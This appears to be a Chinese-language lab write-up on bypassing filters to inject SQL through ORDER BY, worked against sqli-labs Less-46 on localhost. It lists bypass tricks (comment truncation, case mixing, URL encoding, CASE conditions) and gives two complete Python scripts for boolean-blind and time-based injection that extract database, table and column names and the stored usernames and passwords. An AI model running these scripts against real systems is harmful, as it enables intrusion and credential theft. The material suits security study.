绕过过滤order by
一、常见绕过技术
1、注释符截断
利用注释符(如 --、#)截断后续查询,消除过滤逻辑的影响。
ORDER BY 1-- 若原查询为 SELECT * FROM table ORDER BY '用户输入',注入后可能忽略后续过滤逻辑。
2、大小写混淆/编码绕过
若过滤是大小写敏感或未处理编码,可尝试:
-
大小写混合:
OrDeR By 1 -
URL编码:
%4F%52%44%45%52%20%42%59%201(对应ORDER BY 1)
3、嵌套查询或函数
利用数据库函数(如 IF、CASE)或子查询构造条件逻辑。
ORDER BY (CASE WHEN (SELECT SUBSTR(version(),1,1)='5') THEN 1 ELSE 2 END)二、实践
以sqlilabs的第46关为例
1、布尔盲注
import requests
from bs4 import BeautifulSoup
def get_content(resp):
soup = BeautifulSoup(resp.text, 'html.parser')
username_elem = soup.select_one('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')
return username_elem.text.strip() if username_elem else None
def binary_search_injection(base_url, sql_query_template, max_length=100):
result = []
for i in range(1, max_length + 1):
left, right = 32, 127
while left <= right:
mid = (left + right) // 2
url = base_url.format(sql_query=sql_query_template.format(index=i, mid_char=mid))
try:
resp = requests.get(url)
content = get_content(resp)
if content == 'Dumb':
left = mid + 1
else:
right = mid - 1
except Exception as e:
print(f"请求 {url} 失败: {e}")
break
if left > 127 or left < 32:
break
char_to_add = chr(left)
if char_to_add.isspace():
break
result.append(char_to_add)
return ''.join(result)
if __name__ == '__main__':
base_url = "http://127.0.0.1/sqlilabs/Less-46/index.php?sort={sql_query} -- "
database_query = "if(ascii(substr(database(),{index},1))>{mid_char},id,username)"
table_query = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1))>{mid_char},id,username)"
column_query = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{index},1))>{mid_char},id,username)"
data_query = "if(ascii(substr((select group_concat(username,':',password) from users),{index},1))>{mid_char},id,username)"
#数据库名
print(binary_search_injection(base_url, database_query))
#表名
print(binary_search_injection(base_url, table_query))
#列名
print(binary_search_injection(base_url, column_query))
#用户名及密码
print(binary_search_injection(base_url, data_query))实验结果:
2、时间盲注
import requests
import time
def inject_with_time(base_url, sql_query_template, delay=5, max_length=100):
result = []
for i in range(1, max_length + 1):
left, right = 32, 127
while left <= right:
mid = (left + right) // 2
query = sql_query_template.format(index=i, mid_char=mid, delay=delay)
url = base_url.format(sql_query=query)
start_time = time.time()
try:
resp = requests.get(url)
except Exception as e:
print(f"请求 {url} 失败: {e}")
break
elapsed_time = time.time() - start_time
if elapsed_time > delay:
left = mid + 1
else:
right = mid - 1
time.sleep(0.1)
if left > 127 or left < 32:
break
char_to_add = chr(left)
if char_to_add.isspace():
break
result.append(char_to_add)
print(''.join(result))
return ''.join(result)
if __name__ == '__main__':
base_url = "http://127.0.0.1/sqlilabs/Less-46/index.php?sort={sql_query} -- "
database_query = "if(ascii(substr(database(),{index},1))>{mid_char}, sleep({delay}), 0)"
table_query = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1))>{mid_char}, sleep({delay}), 0)"
column_query = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{index},1))>{mid_char}, sleep({delay}), 0)"
data_query = "if(ascii(substr((select group_concat(username,':',password) from users),{index},1))>{mid_char}, sleep({delay}), 0)"
# print(inject_with_time(base_url, database_query, delay=5))
# print(inject_with_time(base_url, table_query, delay=5))
print(inject_with_time(base_url, column_query, delay=5))
# print(inject_with_time(base_url, data_query, delay=5))实验结果:
